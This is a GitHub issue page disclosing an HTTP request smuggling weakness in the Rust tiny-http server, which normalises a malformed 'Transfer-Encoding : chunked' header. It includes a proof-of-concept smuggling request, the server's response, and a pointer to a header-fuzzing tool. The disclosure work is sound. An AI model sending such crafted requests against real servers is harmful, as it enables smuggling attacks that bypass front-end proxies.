You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Posting it here for community patches after talking with the maintainers privately.
Issue: tiny-http doesn't prevent Request Smuggling attacks (CE:TL,TL:TL) where a frontend proxy might allow/pass malformed Transfer Encoding headers but tiny-http will normalise them
POST /login HTTP/1.1
Host: test.local
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
Origin: http://dvws.local
Connection: close
Referer: http://test.local/
Upgrade-Insecure-Requests: 1
DNT: 1
Transfer-Encoding : chunked
19
login=admin&password=xxxx
1
Z
Q
In the above example, the request is sent with the Transfer encoding header having extra spaces (Transfer-Encoding : chunked). This is in violation of RFC 7230. tiny-http is normalizing the Transfer-Encoding : chunked header, hence we get the below reponse.
HTTP/1.1 400 Bad Request
Server: tiny-http (Rust)
Date: Tue, 16 Jun 2020 11:13:12 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 163
{"description":"could not read the body from the request, or could not execute the CGI program","cause":{"description":"Error while decoding chunks","cause":null}}
Posting it here for community patches after talking with the maintainers privately.
Issue: tiny-http doesn't prevent Request Smuggling attacks (CE:TL,TL:TL) where a frontend proxy might allow/pass malformed Transfer Encoding headers but tiny-http will normalise them
Steps to Reproduce
In the above example, the request is sent with the Transfer encoding header having extra spaces (Transfer-Encoding : chunked). This is in violation of RFC 7230. tiny-http is normalizing the
Transfer-Encoding : chunked
header, hence we get the below reponse.More variations of this exist:
You can also use https://github.com/defparam/smuggler to fully check what header variations are allowed.
The text was updated successfully, but these errors were encountered: